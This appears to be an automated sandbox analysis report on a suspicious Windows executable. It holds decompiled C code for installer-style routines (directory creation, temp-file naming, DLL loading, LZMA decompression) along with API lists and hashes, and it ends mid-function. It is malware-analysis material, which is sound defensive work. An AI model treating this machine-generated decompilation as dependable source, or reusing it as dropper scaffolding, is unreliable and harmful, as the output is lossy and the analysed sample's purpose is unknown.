                                                                                                            0x0040289a
                                                                                                            0x0040289a
                                                                                                            0x00401f6c
                                                                                                            0x00401f76
                                                                                                            0x00401f79
                                                                                                            0x00401f88
                                                                                                            0x00401f8c
                                                                                                            0x00401f92
                                                                                                            0x00401f96
                                                                                                            0x00402012
                                                                                                            0x00000000
                                                                                                            0x00402012
                                                                                                            0x00401f98
                                                                                                            0x00401fa2
                                                                                                            0x00401fa6
                                                                                                            0x00401fea
                                                                                                            0x00401fa8
                                                                                                            0x00401fab
                                                                                                            0x00401fae
                                                                                                            0x00401fde
                                                                                                            0x00401fb0
                                                                                                            0x00401fb3
                                                                                                            0x00401fbc
                                                                                                            0x00401fbe
                                                                                                            0x00401fbe
                                                                                                            0x00401fbc
                                                                                                            0x00401fae
                                                                                                            0x00401ff2
                                                                                                            0x00402007
                                                                                                            0x00402007
                                                                                                            0x00000000
                                                                                                            0x00401ff2
                                                                                                            0x00401f7c
                                                                                                            0x00401f82
                                                                                                            0x00401f86
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                              • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                              • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                            • String ID: ?B
                                                                                                            • API String ID: 2987980305-117478770
                                                                                                            • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                            • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                            • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                            • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                            0x004015b3
                                                                                                            0x004015ba
                                                                                                            0x004015bd
                                                                                                            0x004015c2
                                                                                                            0x004015c6
                                                                                                            0x004015c8
                                                                                                            0x004015d0
                                                                                                            0x004015d6
                                                                                                            0x004015d8
                                                                                                            0x004015db
                                                                                                            0x004015e3
                                                                                                            0x004015f0
                                                                                                            0x004015fd
                                                                                                            0x004015fd
                                                                                                            0x004015f2
                                                                                                            0x004015f3
                                                                                                            0x004015fb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004015fb
                                                                                                            0x004015f0
                                                                                                            0x00401600
                                                                                                            0x00401603
                                                                                                            0x00401605
                                                                                                            0x00401606
                                                                                                            0x004015c8
                                                                                                            0x0040160d
                                                                                                            0x0040162d
                                                                                                            0x00402164
                                                                                                            0x0040160f
                                                                                                            0x00401611
                                                                                                            0x0040161c
                                                                                                            0x00401622
                                                                                                            0x00401622
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                              • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 004056FB
                                                                                                              • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                              • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                            • API String ID: 3751793516-1104044542
                                                                                                            • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                            • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                            • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                            • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                            0x00405870
                                                                                                            0x00405876
                                                                                                            0x00405877
                                                                                                            0x00405877
                                                                                                            0x00405878
                                                                                                            0x0040587f
                                                                                                            0x00405889
                                                                                                            0x00405896
                                                                                                            0x00405899
                                                                                                            0x004058a1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004058a5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004058a7
                                                                                                            0x00000000
                                                                                                            0x004058a7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-396624722
                                                                                                            • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                            • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                            • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                            • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 736116DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E736116DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7361405c = _a8;
				 *0x73614060 = _a16;
				 *0x73614064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73614038, E73611556);
				_push(1); // executed
				_t37 = E73611A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E736122AF(_t54);
					}
					E736122F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E736124D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7361156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E736124D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E736124D8(_t54);
							_t37 = GlobalFree(E73611266(E73611559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7361249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E736114E2( *0x73614058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73612CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73612A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E736126B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                            0x736116db
                                                                                                            0x736116db
                                                                                                            0x736116db
                                                                                                            0x736116e5
                                                                                                            0x736116ed
                                                                                                            0x736116fa
                                                                                                            0x73611708
                                                                                                            0x7361170b
                                                                                                            0x7361170d
                                                                                                            0x73611712
                                                                                                            0x73611717
                                                                                                            0x73611836
                                                                                                            0x73611836
                                                                                                            0x7361171d
                                                                                                            0x73611721
                                                                                                            0x73611724
                                                                                                            0x73611729
                                                                                                            0x7361172b
                                                                                                            0x73611731
                                                                                                            0x73611737
                                                                                                            0x73611767
                                                                                                            0x7361176e
                                                                                                            0x73611792
                                                                                                            0x736117dd
                                                                                                            0x73611794
                                                                                                            0x73611794
                                                                                                            0x73611795
                                                                                                            0x7361179b
                                                                                                            0x7361179c
                                                                                                            0x736117a6
                                                                                                            0x736117a9
                                                                                                            0x736117ae
                                                                                                            0x736117b5
                                                                                                            0x736117b5
                                                                                                            0x736117bc
                                                                                                            0x736117c2
                                                                                                            0x736117c8
                                                                                                            0x736117d5
                                                                                                            0x736117d6
                                                                                                            0x736117d9
                                                                                                            0x73611770
                                                                                                            0x73611771
                                                                                                            0x73611786
                                                                                                            0x73611786
                                                                                                            0x736117e7
                                                                                                            0x736117ea
                                                                                                            0x736117f7
                                                                                                            0x736117fe
                                                                                                            0x73611806
                                                                                                            0x73611809
                                                                                                            0x73611809
                                                                                                            0x73611806
                                                                                                            0x73611816
                                                                                                            0x7361181e
                                                                                                            0x73611823
                                                                                                            0x73611816
                                                                                                            0x7361182b
                                                                                                            0x00000000
                                                                                                            0x7361182d
                                                                                                            0x00000000
                                                                                                            0x7361182e
                                                                                                            0x7361182b
                                                                                                            0x7361173b
                                                                                                            0x7361173e
                                                                                                            0x7361175c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361175f
                                                                                                            0x73611764
                                                                                                            0x73611764
                                                                                                            0x73611766
                                                                                                            0x00000000
                                                                                                            0x73611766
                                                                                                            0x73611740
                                                                                                            0x73611741
                                                                                                            0x73611749
                                                                                                            0x7361174a
                                                                                                            0x00000000
                                                                                                            0x7361174a
                                                                                                            0x73611743
                                                                                                            0x73611744
                                                                                                            0x73611752
                                                                                                            0x00000000
                                                                                                            0x73611752
                                                                                                            0x73611747
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611747

                                                                                                            APIs
                                                                                                              • Part of subcall function 73611A98: GlobalFree.KERNEL32 ref: 73611D09
                                                                                                              • Part of subcall function 73611A98: GlobalFree.KERNEL32 ref: 73611D0E
                                                                                                              • Part of subcall function 73611A98: GlobalFree.KERNEL32 ref: 73611D13
                                                                                                            • GlobalFree.KERNEL32 ref: 73611786
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 73611809
                                                                                                            • GlobalFree.KERNEL32 ref: 7361182E
                                                                                                              • Part of subcall function 736122AF: GlobalAlloc.KERNEL32(00000040,?), ref: 736122E0
                                                                                                              • Part of subcall function 736126B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73611757,00000000), ref: 73612782
                                                                                                              • Part of subcall function 7361156B: wsprintfA.USER32 ref: 73611599
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: 11dbdca54a4025d5e891305e6b22d09f8973e5776239d137eed6691436cf680e
                                                                                                            • Instruction ID: fbe182c53be5655f8cceea652f0781735d793c3c19ce5994af84f767072cf9b6
                                                                                                            • Opcode Fuzzy Hash: 11dbdca54a4025d5e891305e6b22d09f8973e5776239d137eed6691436cf680e
                                                                                                            • Instruction Fuzzy Hash: 9A4193F210034ADBEB01AF75DA88B9537FDBF05215F188425E90B9A1C6EB74C165C7B4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                            0x00403209
                                                                                                            0x0040320f
                                                                                                            0x00403215
                                                                                                            0x0040321c
                                                                                                            0x00403221
                                                                                                            0x00403229
                                                                                                            0x00403235
                                                                                                            0x0040323b
                                                                                                            0x0040321f
                                                                                                            0x0040321f
                                                                                                            0x0040321f

                                                                                                            APIs
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                              • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 4115351271-3512041753
                                                                                                            • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                            • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                            • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                            • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 99%
                                                                                                            			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
